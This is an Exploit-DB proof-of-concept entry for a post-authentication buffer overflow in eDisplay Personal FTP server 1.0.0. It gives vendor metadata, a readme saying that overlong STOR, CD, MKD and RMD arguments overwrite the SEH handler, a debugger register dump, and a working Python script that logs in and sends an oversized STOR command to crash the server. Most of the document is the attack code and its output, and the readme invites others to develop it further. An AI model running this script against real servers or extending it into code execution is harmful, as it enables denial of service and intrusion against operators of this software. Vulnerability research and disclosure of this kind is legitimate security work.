eDisplay Personal FTP server 1.0.0 Multiple Post-Authentication Crash (PoC)

vendor:

eDisplay Personal FTP server

by:

The eh?-Team || The Great White Fuzz (we're not sure yet)

N/A

CVSS

N/A

Multiple Post-Authentication Crash

N/A

CWE

Product Name: eDisplay Personal FTP server

Affected Version From: 1.0.0

Affected Version To: 1.0.0

Patch Exists: Unknown

Related CWE: N/A

CPE: edisplay-personal-ftp-server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3 Professional

2010

eDisplay Personal FTP server 1.0.0 Multiple Post-Authentication Crash (PoC)

The STOR command will crash the server and overwrite a few interesting CPU registers. Other commands that will gives similar results are: CD / MKD / RMD They all overwrite SEH in the same manner as the STOR command. During our research, we discovered many other DoS possibilities. These character combinations (%s & %n like DELE) are pretty good at crashing this application.

Mitigation:

Play nice, and remember where you got it from.

Source

Exploit-DB raw data:

# Title: eDisplay Personal FTP server 1.0.0 Multiple Post-Authentication Crash (PoC)
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)
# Found by: loneferret
# Hat's off to dookie2000ca
# Disvovery date: 16/03/2010
# Software link: http://edisplay-personal-ftp-server.software.informer.com/
# Tested on: Windows XP SP3 Professional
# Nod to the Exploit-DB Team

# Vendor informed via email : 17/03/2010

#THE README PART
#The STOR command will crash the server and overwrite a few interesting CPU registers (as shown below).
#Other commands that will gives similar results are: CD / MKD / RMD They all overwrite SEH in the same
#manner as the STOR command.
#During our research, we discovered many other DoS possibilities. These character combinations (%s & %n like DELE) 
#are pretty good at crashing this application.
#As always, if someone wishes to take this further go right ahead. Play nice, and remember where you got it from.
#Thank you.


#SEH chain of main thread
#Address SE handler
#0012C888 41414141

#EAX 7EFEFEFE
#ECX 0012FEF8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\AAAAAAAA,,,,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
#EDX 41414141
#EBX 0139B8D0
#ESP 0012C30C
#EBP 0012C894 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...AAAAAAAAAAAAAAAAAAAAAAA\AAAAAAAAAAAAAAAAAA
#ESI 00000000
#EDI 0012FFFD
#EIP 50E14321 FtpSer_1.50E14321
#C 0 ES 0023 32bit 0(FFFFFFFF)
#P 1 CS 001B 32bit 0(FFFFFFFF)
#A 0 SS 0023 32bit 0(FFFFFFFF)
#Z 1 DS 0023 32bit 0(FFFFFFFF)
#S 0 FS 003B 32bit 7FFDF000(FFF)
#T 0 GS 0000 NULL
#D 0
#O 0 LastErr ERROR_SUCCESS (00000000)
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
#ST0 empty %#.19L
#ST1 empty %#.19L
#ST2 empty +UNORM 19C4 00000000 7FFDF000
#ST3 empty -NAN FFFF 805970D5 F6B61A24
#ST4 empty -UNORM F000 0012FFA8 7FFDF6CC
#ST5 empty +UNORM 0010 00000000 F6B62000
#ST6 empty 0.0
#ST7 empty 45901.499999999995440
# 3 2 1 0 E S P U O Z D I
#FST 0100 Cond 0 0 0 1 Err 0 0 0 0 0 0 0 0 (LT)
#FCW 137F Prec NEAR,64 Mask 1 1 1 1 1 1

#!/usr/bin/python

import socket

buffer= "\x41" * 270

print "Fuzzing CD\r\n"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('xxx.xxx.xxx.xxx',21))
s.recv(1024)
s.send('USER test\r\n')
s.recv(1024)
s.send('PASS test\r\n')
s.recv(1024)
s.send('STOR ' + buffer + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close